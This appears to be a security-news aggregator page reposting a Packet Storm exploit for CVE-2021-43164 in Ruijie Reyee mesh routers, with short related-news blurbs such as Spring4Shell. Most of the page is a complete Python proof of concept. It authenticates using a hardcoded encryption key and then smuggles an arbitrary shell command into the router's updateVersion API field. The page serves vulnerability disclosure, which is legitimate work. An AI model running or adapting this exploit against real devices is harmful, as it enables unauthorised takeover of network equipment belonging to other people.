Security
Headlines
HeadlinesLatestCVEs

Headline

Ruijie Reyee Mesh Router Remote Code Execution

Ruijie Reyee mesh routers with ReyeeOS version 1.55.1915 EW_3.0(1)B11P35 and EW_3.0(1)B11P55 suffer from a remote code execution vulnerability.

Packet Storm
#vulnerability#google#js#rce#auth#ssl
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)# Google Dork: None# Date: November 1, 2021# Exploit Author: Minh Khoa of VSEC# Vendor Homepage: https://ruijienetworks.com# Software Link: https://www.ruijienetworks.com/resources/products/1896-1900# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO# CVE: CVE-2021-43164#!/usr/bin/python3import osimport sysimport timeimport requestsimport jsondef enc(PASS):    key   = "RjYkhwzx$2018!"    shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)    return os.popen(shell).read().strip()try:    TARGET  = sys.argv[1]    USER    = sys.argv[2]    PASS    = sys.argv[3]    COMMAND = sys.argv[4]except Exception:    print("CVE-2021-43164 PoC")    print("Usage:   python3 exploit.py <target> <user> <pass> <command>")    print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'")    sys.exit(1)endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)payload = {        "method": "login",        "params": {            "username": USER,            "password": enc(PASS),            "encry": True,            "time": int(time.time()),            "limit": False            }        }r = requests.post(endpoint, json=payload)sid = json.loads(r.text)["data"]["sid"]endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)payload = {        "method": "updateVersion",        "params": {            "jsonparam": "'; {} #".format(COMMAND)            }        }r = requests.post(endpoint, json=payload)print(r.text)

Related news

Spring4Shell Spring Framework Class Property Remote Code Execution

Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.

CVE-2021-43164: Multiple Vulnerabilities in Ruijie RG-EW Series Routers

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55 via the updateVersion function in /cgi-bin/luci/api/wireless.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution